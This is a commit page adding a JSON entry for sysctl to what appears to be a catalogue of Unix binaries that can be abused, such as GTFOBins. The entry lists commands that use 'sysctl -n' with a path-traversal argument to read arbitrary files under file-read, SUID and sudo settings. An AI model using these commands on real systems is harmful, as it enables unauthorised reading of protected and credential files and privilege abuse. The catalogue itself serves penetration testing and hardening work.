add data source for sysctl

master
t0thkr1s 4 years ago
parent 2cba07135d
commit 68c76a0522

@ -0,0 +1,20 @@
{
"description": "The '-p' argument can also be used in place of '-n'. In both cases though the output might get corrupted, so this might not be suitable to read binary files.",
"functions": {
"file-read": [
{
"code": "/usr/sbin/sysctl -n \"/../../[file]\"\n"
}
],
"suid": [
{
"code": "./sysctl -n \"/../../[file]\"\n"
}
],
"sudo": [
{
"code": "sudo sysctl -n \"/../../[file]\"\n"
}
]
}
}
Loading…
Cancel
Save